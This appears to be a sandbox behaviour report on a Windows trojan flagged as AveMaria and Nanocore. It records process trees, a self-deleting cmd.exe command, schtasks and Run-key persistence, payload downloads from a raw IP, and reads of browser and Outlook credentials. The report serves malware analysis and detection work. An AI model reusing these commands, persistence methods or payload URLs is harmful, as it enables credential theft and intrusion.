- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015dc28, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015de57, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015e028, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015e208, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015e40e, length: 0x00000027"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015e5de, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015e7dd, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015e9d3, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015ebd3, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015ed9e, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015ef6f, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015f149, length: 0x00000029"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015f326, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015f502, length: 0x00000027"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015f706, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015f90a, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015fae7, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015fd14, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015fef8, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001600eb, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001602ff, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001604ed, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001606b5, length: 0x00000027"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001608b2, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00160a9c, length: 0x00000029"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00160c77, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00160eaa, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001610b3, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001612a2, length: 0x00000029"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00161474, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00161643, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0016180b, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00161a04, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00161c14, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00161dde, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00161fdc, length: 0x00000050"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00162216, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001623e8, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001625d1, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0016279f, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001629b1, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00162b8a, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00162d78, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00162f4f, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00163126, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x001632fd, length: 0x0000001b"
- "self_read": "process: wscript.exe, pid: 1656, offset: 0x00000000, length: 0x00000040"
- "self_read": "process: wscript.exe, pid: 1656, offset: 0x000000f0, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 1656, offset: 0x000001e8, length: 0x00000078"
- "self_read": "process: wscript.exe, pid: 1656, offset: 0x00018000, length: 0x00000020"
- "self_read": "process: wscript.exe, pid: 1656, offset: 0x00018058, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 1656, offset: 0x000181a8, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 1656, offset: 0x00018470, length: 0x00000010"
- "self_read": "process: wscript.exe, pid: 1656, offset: 0x00018640, length: 0x00000012"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "images.exe -> C:\\Windows\\System32\\cmd.exe"
- "Process": "images.exe -> cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q \"C:\\ProgramData\\images.exe\""
- "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
- "Process": "images.exe -> C:\\Windows\\System32\\cmd.exe"
- "Process": "images.exe -> cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q \"C:\\ProgramData\\images.exe\""
- "Process": "RegSvcs.exe -> \"schtasks.exe\" /create /f /tn \"DSL Subsystem\" /xml \"C:\\Users\\user\\AppData\\Local\\Temp\\tmp6BE8.tmp\""
- "Process": "RegSvcs.exe -> \"schtasks.exe\" /create /f /tn \"DSL Subsystem Task\" /xml \"C:\\Users\\user\\AppData\\Local\\Temp\\tmp953B.tmp\""
- "Process": "qDABnKekr.exe -> C:\\Windows\\System32\\cmd.exe"
- "Process": "qDABnKekr.exe -> C:\\Windows\\System32\\cmd.exe"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\ProgramData\\images.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://185.62.188.169/paso111.exe"
- "suspicious_request": "http://185.62.188.169/turnx.exe"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://185.62.188.169/paso111.exe"
- "url": "http://185.62.188.169/turnx.exe"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: UPX1, entropy: 7.89, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x000aae00, virtual_size: 0x000ab000"
- "Description": "The executable is compressed using UPX",
- "Details":
- "section": "name: UPX0, entropy: 0.00, characteristics: IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x001ae000"
- "Description": "Attempts to remove evidence of file being downloaded from the Internet",
- "Details":
- "file": "C:\\ProgramData\\images.exe:Zone.Identifier"
- "Description": "Code injection with CreateRemoteThread in a remote process",
- "Details":
- "Injection": "images.exe(2476) -> cmd.exe(2752)"
- "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
- "Details":
- "Process": "svchost.exe (2500)"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "etx.exe(2868) -> RegSvcs.exe(2912)"
- "Description": "Attempts to stop active services",
- "Details":
- "servicename": "UmRdpService"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 9895699 times"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
- "Details":
- "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Images"
- "data": "C:\\ProgramData\\images.exe"
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdate"
- "data": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\POR_IW~1"
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\DSL Subsystem"
- "data": "C:\\Program Files (x86)\\DSL Subsystem\\dslss.exe"
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDll"
- "data": "%ProgramFiles%\\Microsoft DN1\\sqlmap.dll"
- "Description": "Exhibits behavior characteristic of Nanocore RAT",
- "Details":
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF5286d4.TMP"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\aej.mp3"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\aio.icm"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\arr.jpg"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\bwi.icm"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\car.bmp"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ctx.mp3"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\dkr.mp4"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\dpu.ico"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\dti.mp4"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\epu.ppt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\exw.bmp"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\fvg.ico"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\gst.icm"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\gvf.docx"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\hqc.vbs"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ikl.bmp"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\jao.mp3"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\jcp.mp3"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\jig.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\kai.ppt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\kgg.icm"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\kie.mp3"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\lis.mp3"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\lua.mp3"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\mfs.docx"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\mhf.jpg"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\mnm.jpg"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\msw.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\nfb.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\obx.jpg"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\osx.ico"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\pao.mp4"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\pii.ppt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\por=iwi"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\qjd.xl"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\qsh.jpg"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ran.docx"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\rcs.icm"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\rvm.icm"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\sbq.bmp"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\skw.icm"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\tjx.ico"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\tlt.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ttd.jpg"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uel.xl"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ufp.ppt"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uhp.jpg"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uph.jpg"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uuq.bmp"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\vki.dat"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\wwk.xl"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF53f6a1.TMP"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\71619484"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF54169c.TMP"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF549419.TMP"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF5511b5.TMP"
- "Description": "File has been identified by 22 Antiviruses on VirusTotal as malicious",
- "Details":
- "McAfee": "RDN/Generic.tfr"
- "K7AntiVirus": "Trojan ( 005553ee1 )"
- "K7GW": "Trojan ( 005553ee1 )"
- "Cybereason": "malicious.2eb36b"
- "Symantec": "ML.Attribute.HighConfidence"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "Kaspersky": "Trojan-Spy.Win32.AveMaria.bpy"
- "McAfee-GW-Edition": "BehavesLike.Win32.Comame.jc"
- "Trapmine": "suspicious.low.ml.score"
- "FireEye": "Generic.mg.b74568d64360d5a2"
- "SentinelOne": "DFI - Suspicious PE"
- "MaxSecure": "Trojan.Malware.300983.susgen"
- "Antiy-AVL": "TrojanSpy/Win32.AveMaria"
- "Microsoft": "Trojan:Win32/Casur.A!cl"
- "Endgame": "malicious (moderate confidence)"
- "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
- "Acronis": "suspicious"
- "ESET-NOD32": "a variant of Win32/Kryptik.GVIY"
- "eGambit": "Unsafe.AI_Score_93%"
- "CrowdStrike": "win/malicious_confidence_90% (W)"
- "Qihoo-360": "Win32/Trojan.Spy.6ce"
- "Description": "Attempts to modify proxy settings",
- "Details":
- "Description": "Creates a copy of itself",
- "Details":
- "copy": "C:\\ProgramData\\images.exe"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Server"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Password"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Account Name"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Server"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP Password"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP Password"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP Password"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Password"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 User"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Server"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Password"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 User"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Account Name"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP Password"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Server"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Password"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
- "Description": "Generates some ICMP traffic",
- "Details":
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Possible NanoCore C2 60B"
- "signature": "ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016"
- "signature": "ET CURRENT_EVENTS Possible Malicious Macro EXE DL AlphaNumL"
- * Started Service:
- "TermService",
- "VaultSvc",
- "WerSvc",
- "UmRdpService"
- * Mutexes:
- "Local\\_!MSFTHISTORY!_",
- "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
- "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
- "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!",
- "Local\\WininetStartupMutex",
- "Local\\WininetConnectionMutex",
- "Local\\WininetProxyRegistryMutex",
- "Global\\CLR_CASOFF_MUTEX",
- "DefaultTabtip-MainUI",
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "TSLicensingLock",
- "Global\\d6ba4b97-e344-402c-8bc9-737f0cbf68ea",
- "Global\\.net clr networking",
- "Local\\WERReportingForProcess1212",
- "Global\\bca07779-bb70-11e9-81e8-18c086cd4733",
- "Global\\ADAP_WMI_ENTRY"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
- "C:\\ProgramData\\images.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\9SB1EHE2O2TT8HT5MNLA.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
- "C:\\Users\\user\\AppData\\Local\\Microsoft Vision\\10-08-2019_07.36.26",
- "\\??\\PIPE\\samr",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\paso1111.exe",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PA320MG8\\turnx1.exe",
- "C:\\Program Files\\Microsoft DN1\\sqlmap.dll",
- "C:\\Program Files\\Microsoft DN1\\rdpwrap.ini",
- "C:\\Users\\user\\AppData\\Roaming\\Fg.bFic.tmp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\KCANALLUJWTLJB6LXT0E.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF5286d4.TMP",
- "C:\\Windows\\inf\\setupapi.dev.log",
- "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
- "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\__tmp_rar_sfx_access_check_5431031",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\jig.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\por=iwi",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\hqc.vbs",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\tjx.ico",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\pao.mp4",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uuq.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\gst.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\dkr.mp4",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\kgg.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uel.xl",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\epu.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\aej.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\osx.ico",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\lis.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\dti.mp4",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ufp.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\mfs.docx",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uhp.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\qjd.xl",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\uph.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\fvg.ico",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\rcs.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\car.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\sbq.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\lua.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\nfb.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\kie.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\wwk.xl",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\exw.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\gvf.docx",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\msw.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\bwi.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\pii.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ran.docx",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\tlt.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\skw.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\dpu.ico",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\obx.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\jao.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\jcp.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ttd.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\rvm.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\kai.ppt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\qsh.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\arr.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ikl.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ctx.mp3",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\mhf.jpg",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\vki.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\aio.icm",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\mnm.jpg",
- "C:\\rdpwrap.txt",
- "\\Device\\Termdd",
- "\\Device\\RdpDr",
- "\\??\\root#umbus#0000#65a9a6cf-64cd-480b-843e-32c86e1ba19f",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\WKZDQ",
- "C:\\Users\\user\\AppData\\Local\\Microsoft Vision\\10-08-2019_07.37.04",
- "C:\\Users\\user\\AppData\\Roaming\\zw.nJe..tmp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\NK75L0VZKCM5AJXJ5LAQ.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF53f6a1.TMP",
- "C:\\Users\\user\\AppData\\Roaming\\C1515A12-1764-4632-ACE9-A9DFF9253200\\run.dat",
- "C:\\Program Files (x86)\\DSL Subsystem\\dslss.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\tmp6BE8.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\tmp953B.tmp",
- "C:\\Users\\user\\AppData\\Roaming\\C1515A12-1764-4632-ACE9-A9DFF9253200\\catalog.dat",
